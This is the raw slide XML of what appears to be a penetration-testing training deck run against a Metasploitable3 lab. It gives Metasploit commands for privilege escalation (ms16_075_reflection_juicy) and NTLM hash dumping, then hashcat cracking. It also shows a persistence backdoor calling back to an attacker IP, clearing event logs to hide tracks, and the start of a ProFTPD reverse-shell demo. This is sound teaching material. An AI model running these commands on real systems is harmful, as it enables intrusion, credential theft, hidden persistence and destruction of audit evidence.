              <a:t>msf</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; use post/multi/recon/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>local_exploit_suggester</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; set session 1 (1=session id)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&gt; run</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are a few exploits that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>metasploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> suggests us for privilege escalation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We should try one by one.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7209774B-9E33-5FA0-B5B7-114FECA2D9DB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1460376" y="3304713"/>
            <a:ext cx="5943600" cy="1552575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="91161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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>System Hacking Lifecycle</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>There are mainly 5 phases in hacking. Not necessarily a hacker has to follow these 5 steps in a sequential manner. It’s a stepwise process and when followed yields a better result.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F310394D-470C-04A0-6983-637CAAE4906B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5765996" y="2516260"/>
            <a:ext cx="5054404" cy="3560690"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="668200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r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Privilege Escalation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"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fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>For this target we have to use following module to successfully escalate the privilege.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>windows/local/ms16_075_reflection_juicy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Steps:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; use windows/local/ms16_075_reflection_juicy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; set LPORT 9902 (use different port from previous session)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; set session 1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>msf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>&gt; exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we got the privileged user as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>nt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> authority\system </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>user, which is admin</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2008918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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>NTLM Hash Extract and Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When users log into a windows computer, a series of steps is performed for users authentication. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Microsoft has several authentication mechanisms</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Security Account Manager (SAM) Database</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM Authentication </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Kerberos Authentication</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>NTLM authentication stores user’s password as NTLM hash in SAM database which is located in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>C:\Windows\System32\config\SAM</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2871872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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>NTLM Hash Extract and Cracking</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If we can extract the hashes from SAM then we can crack the hash and get the password if we are lucky …</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>From </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>meterepreter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> session </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Meterpreter&gt; run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>hashdump</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49B0C3CA-8979-61A1-EF3D-2FB1CA69080C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1536819" y="3591366"/>
            <a:ext cx="7217254" cy="2580833"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1839224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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Password Cracking with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0" err="1">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we got the NTLM Hash. For cracking the password we need a dictionary </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>wordlist</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> for password and our password cracking tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t># </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>hashcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> -m 1000 hash.txt wordlist.txt   --force                     </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here, -m = mode of hash, 1000= NTLM </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="292052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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Implement backdoor for Maintain Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s assume that the target is restarted, or moved another network or patched the vulnerability that we have exploited. Now for further operation on that network we need to maintain the access by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>creating a fake user </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>implementing backdoor </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>as persistence.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Meterpreter&gt; run persistence  -X -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>i</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> 5 -p 4446 -r 192.168.31.103   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(-A = starts the handler on our  machine / -X start agent at boot / -I = interval for here 5 sec / -p = port / -r =  Remote </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that’s mean attacker </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Now we run multi handler and wait for the connection. When victim restart the machine then we get the session without exploit any vulnerability. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>msf6&gt; use exploit/multi/handler</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3794352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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Clear the tracks</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After achieving our goal, we should clear our transferred files and system logs.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In this situation, we have to clear windows event log.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Meterpreter&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>clearev</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C5A048C3-99F4-63E7-F2CF-8F7410F8E26C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1497598" y="4026009"/>
            <a:ext cx="6196013" cy="1355095"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3139362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pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="4400" b="1" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>Exploitation Demo -3 (Metasploitable3)</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2800"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lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Scenario</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ProFTPD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1.3.5 Remote Code Execution Vulnerability Exploitation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Here in this demo, we will exploit RCE vulnerability in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>proftpd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and get a fully interactive reverse shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="4" name="Group 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CBE29E8A-7695-FAF9-47C8-E66D799BC706}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1668705" y="3221813"/>
            <a:ext cx="9151695" cy="2645587"/>
